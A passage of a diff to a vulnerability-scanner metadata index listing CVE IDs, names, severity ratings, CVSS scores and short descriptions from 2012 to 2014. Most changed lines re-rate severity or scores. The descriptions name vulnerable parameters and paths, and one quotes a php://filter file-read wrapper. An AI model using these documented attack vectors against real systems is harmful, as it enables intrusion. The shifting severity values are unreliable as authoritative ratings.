a certain php_getopt for the 'd' case.\n","Classification":{"CVSSScore":"10.0"}},"file_path":"http/cves/2012/CVE-2012-1823.yaml"} +{"ID":"CVE-2012-1823","Info":{"Name":"PHP CGI v5.3.12/5.4.2 Remote Code Execution","Severity":"high","Description":"sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2012/CVE-2012-1823.yaml"} {"ID":"CVE-2012-1835","Info":{"Name":"WordPress Plugin All-in-One Event Calendar 1.4 - Cross-Site Scripting","Severity":"medium","Description":"Multiple cross-site scripting vulnerabilities in the All-in-One Event Calendar plugin 1.4 and 1.5 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) title parameter to app/view/agenda-widget-form.php; (2) args, (3) title, (4) before_title, or (5) after_title parameter to app/view/agenda-widget.php; (6) button_value parameter to app/view/box_publish_button.php; or (7) msg parameter to /app/view/save_successful.php.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2012/CVE-2012-1835.yaml"} {"ID":"CVE-2012-2371","Info":{"Name":"WP-FaceThumb 0.1 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in index.php in the WP-FaceThumb plugin 0.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the pagination_wp_facethumb parameter.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2012/CVE-2012-2371.yaml"} -{"ID":"CVE-2012-3153","Info":{"Name":"Oracle Forms \u0026 Reports RCE (CVE-2012-3152 \u0026 CVE-2012-3153)","Severity":"critical","Description":"An unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4,\n11.1.1.6, and 11.1.2.0 allows remote attackers to affect confidentiality and integrity via unknown\nvectors related to Report Server Component.\n","Classification":{"CVSSScore":"6.4"}},"file_path":"http/cves/2012/CVE-2012-3153.yaml"} +{"ID":"CVE-2012-3153","Info":{"Name":"Oracle Forms \u0026 Reports RCE (CVE-2012-3152 \u0026 CVE-2012-3153)","Severity":"medium","Description":"An unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4,\n11.1.1.6, and 11.1.2.0 allows remote attackers to affect confidentiality and integrity via unknown\nvectors related to Report Server Component.\n","Classification":{"CVSSScore":"6.4"}},"file_path":"http/cves/2012/CVE-2012-3153.yaml"} +{"ID":"CVE-2012-4032","Info":{"Name":"WebsitePanel before v1.2.2.1 - Open Redirect","Severity":"medium","Description":"Open redirect vulnerability in the login page in WebsitePanel before 1.2.2.1 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in ReturnUrl to Default.aspx\n","Classification":{"CVSSScore":"5.8"}},"file_path":"http/cves/2012/CVE-2012-4032.yaml"} {"ID":"CVE-2012-4242","Info":{"Name":"WordPress Plugin MF Gig Calendar 0.9.2 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in the MF Gig Calendar plugin 0.9.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the query string to the calendar page.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2012/CVE-2012-4242.yaml"} -{"ID":"CVE-2012-4253","Info":{"Name":"MySQLDumper 1.24.4 - Directory Traversal","Severity":"high","Description":"Multiple directory traversal vulnerabilities in MySQLDumper 1.24.4 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) language parameter to learn/cubemail/install.php or (2) f parameter learn/cubemail/filemanagement.php, or execute arbitrary local files via a .. (dot dot) in the (3) config parameter to learn/cubemail/menu.php.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2012/CVE-2012-4253.yaml"} +{"ID":"CVE-2012-4253","Info":{"Name":"MySQLDumper 1.24.4 - Directory Traversal","Severity":"medium","Description":"Multiple directory traversal vulnerabilities in MySQLDumper 1.24.4 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) language parameter to learn/cubemail/install.php or (2) f parameter learn/cubemail/filemanagement.php, or execute arbitrary local files via a .. (dot dot) in the (3) config parameter to learn/cubemail/menu.php.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2012/CVE-2012-4253.yaml"} {"ID":"CVE-2012-4273","Info":{"Name":"2 Click Socialmedia Buttons \u003c 0.34 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in libs/xing.php in the 2 Click Social Media Buttons plugin before 0.34 for WordPress allows remote attackers to inject arbitrary web script or HTML via the xing-url parameter.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2012/CVE-2012-4273.yaml"} {"ID":"CVE-2012-4547","Info":{"Name":"AWStats 6.95/7.0 - 'awredir.pl' Cross-Site Scripting","Severity":"medium","Description":"AWStats is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2012/CVE-2012-4547.yaml"} {"ID":"CVE-2012-4768","Info":{"Name":"WordPress Plugin Download Monitor \u003c 3.3.5.9 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in the Download Monitor plugin before 3.3.5.9 for WordPress allows remote attackers to inject arbitrary web script or HTML via the dlsearch parameter to the default URI.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2012/CVE-2012-4768.yaml"} -{"ID":"CVE-2012-4878","Info":{"Name":"FlatnuX CMS - Directory Traversal","Severity":"high","Description":"A path traversal vulnerability in controlcenter.php in FlatnuX CMS 2011 08.09.2 allows remote administrators to read arbitrary files via a full pathname in the dir parameter in a contents/Files action.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2012/CVE-2012-4878.yaml"} +{"ID":"CVE-2012-4878","Info":{"Name":"FlatnuX CMS - Directory Traversal","Severity":"medium","Description":"A path traversal vulnerability in controlcenter.php in FlatnuX CMS 2011 08.09.2 allows remote administrators to read arbitrary files via a full pathname in the dir parameter in a contents/Files action.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2012/CVE-2012-4878.yaml"} {"ID":"CVE-2012-4889","Info":{"Name":"ManageEngine Firewall Analyzer 7.2 - Cross-Site Scripting","Severity":"medium","Description":"Multiple cross-site scripting vulnerabilities in ManageEngine Firewall Analyzer 7.2 allow remote attackers to inject arbitrary web script or HTML via the (1) subTab or (2) tab parameter to createAnomaly.do; (3) url, (4) subTab, or (5) tab parameter to mindex.do; (6) tab parameter to index2.do; or (7) port parameter to syslogViewer.do.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2012/CVE-2012-4889.yaml"} -{"ID":"CVE-2012-4940","Info":{"Name":"Axigen Mail Server Filename Directory Traversal","Severity":"high","Description":"Multiple directory traversal vulnerabilities in the View Log Files component in Axigen Free Mail Server allow remote attackers to read or delete arbitrary files via a .. (dot dot) in the fileName parameter in a download action to source/loggin/page_log_dwn_file.hsp, or the fileName parameter in an edit or delete action to the default URI.","Classification":{"CVSSScore":"6.4"}},"file_path":"http/cves/2012/CVE-2012-4940.yaml"} +{"ID":"CVE-2012-4940","Info":{"Name":"Axigen Mail Server Filename Directory Traversal","Severity":"medium","Description":"Multiple directory traversal vulnerabilities in the View Log Files component in Axigen Free Mail Server allow remote attackers to read or delete arbitrary files via a .. (dot dot) in the fileName parameter in a download action to source/loggin/page_log_dwn_file.hsp, or the fileName parameter in an edit or delete action to the default URI.","Classification":{"CVSSScore":"6.4"}},"file_path":"http/cves/2012/CVE-2012-4940.yaml"} {"ID":"CVE-2012-4982","Info":{"Name":"Forescout CounterACT 6.3.4.1 - Open Redirect","Severity":"medium","Description":"Open redirect vulnerability in assets/login on the Forescout CounterACT NAC device before 7.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the 'a' parameter.\n","Classification":{"CVSSScore":"5.8"}},"file_path":"http/cves/2012/CVE-2012-4982.yaml"} +{"ID":"CVE-2012-5321","Info":{"Name":"TikiWiki CMS Groupware v8.3 - Open Redirect","Severity":"medium","Description":"tiki-featured_link.php in TikiWiki CMS/Groupware 8.3 allows remote attackers to load arbitrary web site pages into frames and conduct phishing attacks via the url parameter, aka \"frame injection\n","Classification":{"CVSSScore":"5.8"}},"file_path":"http/cves/2012/CVE-2012-5321.yaml"} {"ID":"CVE-2012-5913","Info":{"Name":"WordPress Integrator 1.32 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in wp-integrator.php in the WordPress Integrator module 1.32 for WordPress allows remote attackers to inject arbitrary web script or HTML via the redirect_to parameter to wp-login.php.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2012/CVE-2012-5913.yaml"} {"ID":"CVE-2012-6499","Info":{"Name":"WordPress Plugin Age Verification v0.4 - Open Redirect","Severity":"medium","Description":"Open redirect vulnerability in age-verification.php in the Age Verification plugin 0.4 and earlier for WordPress allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect_to parameter.\n","Classification":{"CVSSScore":"5.8"}},"file_path":"http/cves/2012/CVE-2012-6499.yaml"} {"ID":"CVE-2013-1965","Info":{"Name":"Apache Struts2 S2-012 RCE","Severity":"critical","Description":"Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.3, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect.","Classification":{"CVSSScore":"9.3"}},"file_path":"http/cves/2013/CVE-2013-1965.yaml"} -{"ID":"CVE-2013-2248","Info":{"Name":"Apache Struts - Multiple Open Redirection Vulnerabilities","Severity":"medium","Description":"Apache Struts is prone to multiple open-redirection vulnerabilities because the application fails to properly sanitize user-supplied input.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2013/CVE-2013-2248.yaml"} +{"ID":"CVE-2013-2248","Info":{"Name":"Apache Struts - Multiple Open Redirection Vulnerabilities","Severity":"medium","Description":"Apache Struts is prone to multiple open-redirection vulnerabilities because the application fails to properly sanitize user-supplied input.","Classification":{"CVSSScore":"5.8"}},"file_path":"http/cves/2013/CVE-2013-2248.yaml"} {"ID":"CVE-2013-2251","Info":{"Name":"Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution","Severity":"critical","Description":"In Struts 2 before 2.3.15.1 the information following \"action:\", \"redirect:\", or \"redirectAction:\" is not properly sanitized and will be evaluated as an OGNL expression against the value stack. This introduces the possibility to inject server side code.","Classification":{"CVSSScore":"9.3"}},"file_path":"http/cves/2013/CVE-2013-2251.yaml"} {"ID":"CVE-2013-2287","Info":{"Name":"WordPress Plugin Uploader 1.0.4 - Cross-Site Scripting","Severity":"medium","Description":"Multiple cross-site scripting vulnerabilities in views/notify.php in the Uploader plugin 1.0.4 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) notify or (2) blog parameter.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2013/CVE-2013-2287.yaml"} {"ID":"CVE-2013-2621","Info":{"Name":"Telaen =\u003e v1.3.1 - Open Redirect","Severity":"medium","Description":"Open Redirection Vulnerability in the redir.php script in Telaen before 1.3.1 allows remote attackers to redirect victims to arbitrary websites via a crafted URL.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2013/CVE-2013-2621.yaml"} @@ -204,20 +206,20 @@ {"ID":"CVE-2013-3827","Info":{"Name":"Javafaces LFI","Severity":"medium","Description":"An Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2; the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.2.3.0, 11.1.2.4.0, and 12.1.2.0.0; and the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0 and 12.1.1 allows remote attackers to affect confidentiality via unknown vectors related to Java Server Faces or Web Container.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2013/CVE-2013-3827.yaml"} {"ID":"CVE-2013-4117","Info":{"Name":"WordPress Plugin Category Grid View Gallery 2.3.1 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in includes/CatGridPost.php in the Category Grid View Gallery plugin 2.3.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the ID parameter.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2013/CVE-2013-4117.yaml"} {"ID":"CVE-2013-4625","Info":{"Name":"WordPress Plugin Duplicator \u003c 0.4.5 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in files/installer.cleanup.php in the Duplicator plugin before 0.4.5 for WordPress allows remote attackers to inject arbitrary web script or HTML via the package parameter.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2013/CVE-2013-4625.yaml"} -{"ID":"CVE-2013-5528","Info":{"Name":"Cisco Unified Communications Manager 7/8/9 - Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability in the Tomcat administrative web interface in Cisco Unified Communications Manager allows remote authenticated users to read arbitrary files via directory traversal sequences in an unspecified input string, aka Bug ID CSCui78815","Classification":{"CVSSScore":"4"}},"file_path":"http/cves/2013/CVE-2013-5528.yaml"} -{"ID":"CVE-2013-5979","Info":{"Name":"Xibo 1.2.2/1.4.1 - Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability in Spring Signage Xibo 1.2.x before 1.2.3 and 1.4.x before 1.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the p parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2013/CVE-2013-5979.yaml"} -{"ID":"CVE-2013-6281","Info":{"Name":"WordPress Spreadsheet - Cross-Site Scripting","Severity":"medium","Description":"WordPress Spreadsheet plugin contains a reflected cross-site scripting vulnerability in /dhtmlxspreadsheet/codebase/spreadsheet.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2013/CVE-2013-6281.yaml"} -{"ID":"CVE-2013-7091","Info":{"Name":"Zimbra Collaboration Server 7.2.2/8.0.2 Local File Inclusion","Severity":"critical","Description":"A directory traversal vulnerability in /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz in Zimbra 7.2.2 and 8.0.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the skin parameter. This can be leveraged to execute arbitrary code by obtaining LDAP credentials and accessing the service/admin/soap API.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2013/CVE-2013-7091.yaml"} -{"ID":"CVE-2013-7240","Info":{"Name":"WordPress Plugin Advanced Dewplayer 1.2 - Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability in download-file.php in the Advanced Dewplayer plugin 1.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the dew_file parameter.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2013/CVE-2013-7240.yaml"} +{"ID":"CVE-2013-5528","Info":{"Name":"Cisco Unified Communications Manager 7/8/9 - Directory Traversal","Severity":"medium","Description":"A directory traversal vulnerability in the Tomcat administrative web interface in Cisco Unified Communications Manager allows remote authenticated users to read arbitrary files via directory traversal sequences in an unspecified input string, aka Bug ID CSCui78815","Classification":{"CVSSScore":"4"}},"file_path":"http/cves/2013/CVE-2013-5528.yaml"} +{"ID":"CVE-2013-5979","Info":{"Name":"Xibo 1.2.2/1.4.1 - Directory Traversal","Severity":"medium","Description":"A directory traversal vulnerability in Spring Signage Xibo 1.2.x before 1.2.3 and 1.4.x before 1.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the p parameter to index.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2013/CVE-2013-5979.yaml"} +{"ID":"CVE-2013-6281","Info":{"Name":"WordPress Spreadsheet - Cross-Site Scripting","Severity":"medium","Description":"WordPress Spreadsheet plugin contains a reflected cross-site scripting vulnerability in /dhtmlxspreadsheet/codebase/spreadsheet.php.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2013/CVE-2013-6281.yaml"} +{"ID":"CVE-2013-7091","Info":{"Name":"Zimbra Collaboration Server 7.2.2/8.0.2 Local File Inclusion","Severity":"medium","Description":"A directory traversal vulnerability in /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz in Zimbra 7.2.2 and 8.0.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the skin parameter. This can be leveraged to execute arbitrary code by obtaining LDAP credentials and accessing the service/admin/soap API.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2013/CVE-2013-7091.yaml"} +{"ID":"CVE-2013-7240","Info":{"Name":"WordPress Plugin Advanced Dewplayer 1.2 - Directory Traversal","Severity":"medium","Description":"A directory traversal vulnerability in download-file.php in the Advanced Dewplayer plugin 1.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the dew_file parameter.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2013/CVE-2013-7240.yaml"} {"ID":"CVE-2013-7285","Info":{"Name":"XStream \u003c1.4.6/1.4.10 - Remote Code Execution","Severity":"critical","Description":"Xstream API before 1.4.6 and 1.4.10 is susceptible to remote code execution. If the security framework has not been initialized, an attacker can run arbitrary shell commands by manipulating the processed input stream when unmarshaling XML or any supported format. This can allow an attacker to obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2013/CVE-2013-7285.yaml"} {"ID":"CVE-2014-10037","Info":{"Name":"DomPHP 0.83 - Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability in DomPHP 0.83 and earlier allows remote attackers to have unspecified impacts via a .. (dot dot) in the url parameter to photoalbum/index.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2014/CVE-2014-10037.yaml"} {"ID":"CVE-2014-1203","Info":{"Name":"Eyou E-Mail \u003c3.6 - Remote Code Execution","Severity":"critical","Description":"Eyou Mail System before 3.6 allows remote attackers to execute arbitrary commands via shell metacharacters in the domain parameter to admin/domain/ip_login_set/d_ip_login_get.php via the get_login_ip_config_file function.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2014/CVE-2014-1203.yaml"} -{"ID":"CVE-2014-2321","Info":{"Name":"ZTE Cable Modem Web Shell","Severity":"high","Description":"ZTE F460 and F660 cable modems allows remote attackers to obtain administrative access via sendcmd requests to web_shell_cmd.gch, as demonstrated by using \"set TelnetCfg\" commands to enable a TELNET service with specified credentials.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2014/CVE-2014-2321.yaml"} +{"ID":"CVE-2014-2321","Info":{"Name":"ZTE Cable Modem Web Shell","Severity":"critical","Description":"ZTE F460 and F660 cable modems allows remote attackers to obtain administrative access via sendcmd requests to web_shell_cmd.gch, as demonstrated by using \"set TelnetCfg\" commands to enable a TELNET service with specified credentials.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2014/CVE-2014-2321.yaml"} {"ID":"CVE-2014-2323","Info":{"Name":"Lighttpd 1.4.34 SQL Injection and Path Traversal","Severity":"critical","Description":"A SQL injection vulnerability in mod_mysql_vhost.c in lighttpd before 1.4.35 allows remote attackers to execute arbitrary SQL commands via the host name (related to request_check_hostname).","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2014/CVE-2014-2323.yaml"} -{"ID":"CVE-2014-2383","Info":{"Name":"Dompdf \u003c v0.6.0 - Local File Inclusion","Severity":"high","Description":"A vulnerability in dompdf.php in dompdf before 0.6.1, when DOMPDF_ENABLE_PHP is enabled, allows context-dependent attackers to bypass chroot protections and read arbitrary files via a PHP protocol and wrappers in the input_file parameter, as demonstrated by a php://filter/read=convert.base64-encode/resource in the input_file parameter.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2014/CVE-2014-2383.yaml"} +{"ID":"CVE-2014-2383","Info":{"Name":"Dompdf \u003c v0.6.0 - Local File Inclusion","Severity":"medium","Description":"A vulnerability in dompdf.php in dompdf before 0.6.1, when DOMPDF_ENABLE_PHP is enabled, allows context-dependent attackers to bypass chroot protections and read arbitrary files via a PHP protocol and wrappers in the input_file parameter, as demonstrated by a php://filter/read=convert.base64-encode/resource in the input_file parameter.\n","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2014/CVE-2014-2383.yaml"} {"ID":"CVE-2014-2908","Info":{"Name":"Siemens SIMATIC S7-1200 CPU - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in the integrated web server on Siemens SIMATIC S7-1200 CPU devices 2.x and 3.x allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2014/CVE-2014-2908.yaml"} {"ID":"CVE-2014-2962","Info":{"Name":"Belkin N150 Router 1.00.08/1.00.09 - Path Traversal","Severity":"high","Description":"A path traversal vulnerability in the webproc cgi module on the Belkin N150 F9K1009 v1 router with firmware before 1.00.08 allows remote attackers to read arbitrary files via a full pathname in the getpage parameter.","Classification":{"CVSSScore":"7.8"}},"file_path":"http/cves/2014/CVE-2014-2962.yaml"} -{"ID":"CVE-2014-3120","Info":{"Name":"ElasticSearch v1.1.1/1.2 RCE","Severity":"critical","Description":"The default configuration in Elasticsearch before 1.2 enables dynamic scripting, which allows remote attackers to execute arbitrary MVEL expressions and Java code via the source parameter to _search. Be aware this only violates the vendor's intended security policy if the user does not run Elasticsearch in its own independent virtual machine.\n","Classification":{"CVSSScore":"10.0"}},"file_path":"http/cves/2014/CVE-2014-3120.yaml"} +{"ID":"CVE-2014-3120","Info":{"Name":"ElasticSearch v1.1.1/1.2 RCE","Severity":"medium","Description":"The default configuration in Elasticsearch before 1.2 enables dynamic scripting, which allows remote attackers to execute arbitrary MVEL expressions and Java code via the source parameter to _search. Be aware this only violates the vendor's intended security policy if the user does not run Elasticsearch in its own independent virtual machine.\n","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2014/CVE-2014-3120.yaml"} {"ID":"CVE-2014-3206","Info":{"Name":"Seagate BlackArmor NAS - Command Injection","Severity":"critical","Description":"Seagate BlackArmor NAS allows remote attackers to execute arbitrary code via the session parameter to localhost/backupmgt/localJob.php or the auth_name parameter to localhost/backupmgmt/pre_connect_check.php.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2014/CVE-2014-3206.yaml"} {"ID":"CVE-2014-3704","Info":{"Name":"Drupal SQL Injection","Severity":"high","Description":"The expandArguments function in the database abstraction API in Drupal core 7.x before 7.32 does not properly construct prepared statements, which allows remote attackers to conduct SQL injection attacks via an array containing specially crafted keys.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2014/CVE-2014-3704.yaml"} {"ID":"CVE-2014-3744","Info":{"Name":"Node.js st module Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary files via a %2e%2e (encoded dot dot) in an unspecified path.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2014/CVE-2014-3744.yaml"} @@ -230,67 +232,69 @@ {"ID":"CVE-2014-4550","Info":{"Name":"Shortcode Ninja \u003c= 1.4 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in preview-shortcode-external.php in the Shortcode Ninja plugin 1.4 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the shortcode parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2014/CVE-2014-4550.yaml"} {"ID":"CVE-2014-4558","Info":{"Name":"WooCommerce Swipe \u003c= 2.7.1 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in test-plugin.php in the Swipe Checkout for WooCommerce plugin 2.7.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the api_url parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2014/CVE-2014-4558.yaml"} {"ID":"CVE-2014-4561","Info":{"Name":"Ultimate Weather Plugin \u003c= 1.0 - Cross-Site Scripting","Severity":"medium","Description":"The ultimate-weather plugin 1.0 for WordPress contains a cross-site scripting vulnerability.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2014/CVE-2014-4561.yaml"} -{"ID":"CVE-2014-4592","Info":{"Name":"WP Planet \u003c= 0.1 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in rss.class/scripts/magpie_debug.php in the WP-Planet plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the url parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2014/CVE-2014-4592.yaml"} -{"ID":"CVE-2014-4940","Info":{"Name":"WordPress Plugin Tera Charts - Local File Inclusion","Severity":"high","Description":"Multiple local file inclusion vulnerabilities in Tera Charts (tera-charts) plugin 0.1 for WordPress allow remote attackers to read arbitrary files via a .. (dot dot) in the fn parameter to (1) charts/treemap.php or (2) charts/zoomabletreemap.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2014/CVE-2014-4940.yaml"} -{"ID":"CVE-2014-4942","Info":{"Name":"WordPress EasyCart \u003c2.0.6 - Information Disclosure","Severity":"low","Description":"WordPress EasyCart plugin before 2.0.6 contains an information disclosure vulnerability. An attacker can obtain configuration information via a direct request to inc/admin/phpinfo.php, which calls the phpinfo function.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2014/CVE-2014-4942.yaml"} -{"ID":"CVE-2014-5111","Info":{"Name":"Fonality trixbox - Local File Inclusion","Severity":"high","Description":"Multiple local file inclusion vulnerabilities in Fonality trixbox allow remote attackers to read arbitrary files via a .. (dot dot) in the lang parameter to (1) home/index.php, (2) asterisk_info/asterisk_info.php, (3) repo/repo.php, or (4) endpointcfg/endpointcfg.php in maint/modules/.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2014/CVE-2014-5111.yaml"} -{"ID":"CVE-2014-5258","Info":{"Name":"webEdition 6.3.8.0 - Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability in showTempFile.php in webEdition CMS before 6.3.9.0 Beta allows remote authenticated users to read arbitrary files via a .. (dot dot) in the file parameter.","Classification":{"CVSSScore":"4"}},"file_path":"http/cves/2014/CVE-2014-5258.yaml"} -{"ID":"CVE-2014-5368","Info":{"Name":"WordPress Plugin WP Content Source Control - Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability in the file_get_contents function in downloadfiles/download.php in the WP Content Source Control (wp-source-control) plugin 3.0.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2014/CVE-2014-5368.yaml"} +{"ID":"CVE-2014-4592","Info":{"Name":"WP Planet \u003c= 0.1 - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability in rss.class/scripts/magpie_debug.php in the WP-Planet plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the url parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2014/CVE-2014-4592.yaml"} +{"ID":"CVE-2014-4940","Info":{"Name":"WordPress Plugin Tera Charts - Local File Inclusion","Severity":"medium","Description":"Multiple local file inclusion vulnerabilities in Tera Charts (tera-charts) plugin 0.1 for WordPress allow remote attackers to read arbitrary files via a .. (dot dot) in the fn parameter to (1) charts/treemap.php or (2) charts/zoomabletreemap.php.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2014/CVE-2014-4940.yaml"} +{"ID":"CVE-2014-4942","Info":{"Name":"WordPress EasyCart \u003c2.0.6 - Information Disclosure","Severity":"medium","Description":"WordPress EasyCart plugin before 2.0.6 contains an information disclosure vulnerability. An attacker can obtain configuration information via a direct request to inc/admin/phpinfo.php, which calls the phpinfo function.\n","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2014/CVE-2014-4942.yaml"} +{"ID":"CVE-2014-5111","Info":{"Name":"Fonality trixbox - Local File Inclusion","Severity":"medium","Description":"Multiple local file inclusion vulnerabilities in Fonality trixbox allow remote attackers to read arbitrary files via a .. (dot dot) in the lang parameter to (1) home/index.php, (2) asterisk_info/asterisk_info.php, (3) repo/repo.php, or (4) endpointcfg/endpointcfg.php in maint/modules/.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2014/CVE-2014-5111.yaml"} +{"ID":"CVE-2014-5258","Info":{"Name":"webEdition 6.3.8.0 - Directory Traversal","Severity":"medium","Description":"A directory traversal vulnerability in showTempFile.php in webEdition CMS before 6.3.9.0 Beta allows remote authenticated users to read arbitrary files via a .. (dot dot) in the file parameter.","Classification":{"CVSSScore":"4"}},"file_path":"http/cves/2014/CVE-2014-5258.yaml"} +{"ID":"CVE-2014-5368","Info":{"Name":"WordPress Plugin WP Content Source Control - Directory Traversal","Severity":"medium","Description":"A directory traversal vulnerability in the file_get_contents function in downloadfiles/download.php in the WP Content Source Control (wp-source-control) plugin 3.0.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2014/CVE-2014-5368.yaml"} {"ID":"CVE-2014-6271","Info":{"Name":"ShellShock - Remote Code Execution","Severity":"critical","Description":"GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka ShellShock.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2014/CVE-2014-6271.yaml"} {"ID":"CVE-2014-6287","Info":{"Name":"HTTP File Server \u003c2.3c - Remote Command 